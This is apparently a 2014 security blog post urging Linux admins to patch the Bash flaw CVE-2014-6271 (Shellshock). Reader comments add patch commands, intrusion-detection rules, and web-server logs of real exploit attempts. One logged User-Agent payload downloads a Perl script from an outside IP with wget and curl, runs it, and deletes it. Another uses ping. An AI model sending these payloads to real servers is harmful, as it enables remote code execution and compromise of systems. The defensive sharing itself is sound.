Attention *NIX admins, time to patch!
Over the past years, we became used to Microsoft Patches, the important, critical ones that would render your system fully vulnerable if you didn't apply them. We probably became so used that sometime we forget that our Linux servers also need patches.
Today I've learned about a critical Bash patch, that addresses the CVE-2014-6271. According the advisory:
"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."
The patches are already ready for most of the Linux distros, like RedHat and Debian, so waste no time.
---
Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure
Comments
Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
Anonymous
Sep 24th 2014
9 years ago
https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4
Apache:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)
Bash:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Anonymous
Sep 24th 2014
9 years ago
https://access.redhat.com/articles/1200223
Anonymous
Sep 25th 2014
9 years ago
https://access.redhat.com/articles/1200223
Anonymous
Sep 25th 2014
9 years ago
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*
This also appears to be using spoofed source IP's. No logs at this time.
Anonymous
Sep 25th 2014
9 years ago
It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Anonymous
Sep 25th 2014
9 years ago
89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
Shouldn't this rate setting the Threat Level to at least chartreuse?
Anonymous
Sep 25th 2014
9 years ago